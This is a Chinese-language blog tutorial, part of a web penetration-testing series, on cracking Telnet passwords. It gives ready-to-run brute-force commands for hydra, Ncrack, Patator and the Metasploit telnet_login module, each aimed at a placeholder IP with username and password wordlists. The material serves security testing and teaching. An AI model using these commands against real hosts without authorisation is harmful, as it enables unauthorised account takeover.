当前位置:网站首页>web渗透测试----5、暴力破解漏洞--(4)Telnet密码破解
web渗透测试----5、暴力破解漏洞--(4)Telnet密码破解
2022-06-24 03:34:00 【七天啊】
远程登录协议(teletype network:Telnet)是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。默认端口:23
一、hydra
Hydra 是一个并行的登录破解器,它支持多种攻击协议。它非常快速和灵活,并且新模块很容易添加。kali工具集已集成。
hydra项目地址:
https://github.com/vanhauser-thc/thc-hydra/releases全版本
hydra支持:
Cisco AAA、Cisco auth、Cisco enable、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、HTTP(S)-HEAD、HTTP-代理、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NNTP、Oracle 侦听器、Oracle SID、PC-Anywhere、PC-NFS、POP3、PostgreSQL、RDP、Rexec、Rlogin、Rsh、SIP、SMB(NT)、SMTP、SMTP 枚举、SNMP v1+v2+v3、SOCKS5、SSH(v1 和 v2)、SSHKEY、Subversion、Teamspeak (TS2)、Telnet、VMware-Auth、VNC 和 XMPP`。
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt IP telnet
-L:指定用户名字典路径-P:指定密码字典路径
二、Ncrack
Ncrack是一款高速网络认证破解工具。它旨在通过主动测试其所有主机和网络设备的密码错误来帮助公司保护其网络。Ncrack 是使用模块化方法、类似于 Nmap 的命令行语法和可以根据网络反馈调整其行为的动态引擎设计的。它允许对多个主机进行快速而可靠的大规模审计。kali工具集已集成。
Ncrack 的功能包括一个非常灵活的界面,允许用户完全控制网络操作,允许非常复杂的暴力破解攻击,易于使用的定时模板,类似于 Nmap 的运行时交互等等。支持的协议包括
SSH、RDP、FTP、Telnet、HTTP(S)、Wordpress、POP3(S)、IMAP、CVS、SMB、VNC、SIP、Redis、PostgreSQL、MQTT、MySQL、MSSQL、MongoDB、Cassandra、WinRM、OWA , 和 DICOM
ncrack -U /root/Desktop/user.txt –P /root/Desktop/pass.txt IP:23
-U:表示用户名列表的路径-P:表示密码列表的路径-v:增加详细级别(使用两次或更多以获得更好的效果
三、Patator
Patator 是出于对使用 Hydra、Medusa、Ncrack、Metasploit 模块和 Nmap NSE 脚本进行密码猜测攻击的挫败感而编写的。我选择了一种不同的方法,以便不创建另一个暴力破解工具并避免重复相同的缺点。Patator 是一个用 Python 编写的多线程工具,它力求比他的前辈们更加可靠和灵活。
patator telnet_login host=IP inputs='FILE0\nFILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re='Username: | Password:'
四、Metasploit
use auxiliary/scanner/telnet/telnet_login
msf exploit (telnet_login)>set rhosts IP (远程主机IP)
msf exploit (telnet_login)>set user_file /root/Desktop/user txt
msf exploit (telnet_login)>set pass_file /root/Desktop/pass.txt
msf exploit (telnet_login)>set stop_on_success true
msf exploit (telnet_login)> exploit
边栏推荐
- How to register a trademark? Is the process troublesome?
- Industrial security experts talk about how to build security protection capability for government big data platform?
- If the cloud knows that security is important
- Velocitytracker use
- Lua language development, esp8266 access to Bafa cloud, mqtt and TCP protocols
- What is an edge calculator? How is the unit price of the edge calculator calculated?
- Sorting out of key vulnerabilities identified by CMS in the peripheral management of red team (I)
- The request was aborted: Could not create SSL/TLS secure channel.
- Using RDM (Remote Desktop Manager) to import CSV batch remote
- EIP maximum EIP EIP remote desktop access
猜你喜欢

QT creator tips

Community pycharm installation visual database
![[summary of interview questions] zj5](/img/d8/ece82f8b2479adb948ba706f6f5039.jpg)
[summary of interview questions] zj5

Get to know MySQL database

Sorting out of key vulnerabilities identified by CMS in the peripheral management of red team (I)

Simple and beautiful weather code
![[summary of interview questions] zj6 redis](/img/4b/eadf66ca8d834f049f3546d348fa32.jpg)
[summary of interview questions] zj6 redis

Ar 3D map technology

On Sunday, I rolled up the uni app "uview excellent UI framework"
随机推荐
How to check the progress of trademark registration? Where can I find it?
Liaoyuan social cloud primary actual combat camp test environment script
Can elastic public IP be bound to a home server? The difference between elastic public IP and fixed IP
Industrial security experts talk about how to build security protection capability for government big data platform?
[congratulations] rock solid! A new generation of AMD Blackstone architecture instance is launched!
NLP task summary introduction and understanding
The medical technology giant was blackmailed and Microsoft announced 74 security vulnerabilities | global network security hotspot
Technical dry goods - how to use AI technology to accurately identify mining Trojans
What is the GPU usage for cloud desktops and servers? What can cloud desktop do?
How does cloud computing achieve elastic scaling? What are the characteristics of elasticity?
What does cloud desktop mean? What are the characteristics of cloud desktop?
What is cloud desktop and how to connect to the server? What does the mainstream architecture of cloud desktop include?
Is the cloud desktop server highly required for installation and configuration? Is cloud desktop easy to use?
Shopee Clickhouse cold and hot data separation storage architecture and Practice
Understand Devops from the perspective of leader
"Sharp weapon" for enterprise resumption? When the sale comes, the contract should be signed like this!
What are the advantages of EIP? What is the relationship between EIP and fixed IP?
General scheme for improving reading and writing ability of online es cluster
Is the cloud game edge computing server highly required? What problems will occur during the use of cloud game edge computing server?
[hot] with a budget of only 100 yuan, how to build a 1-year web site on Tencent cloud??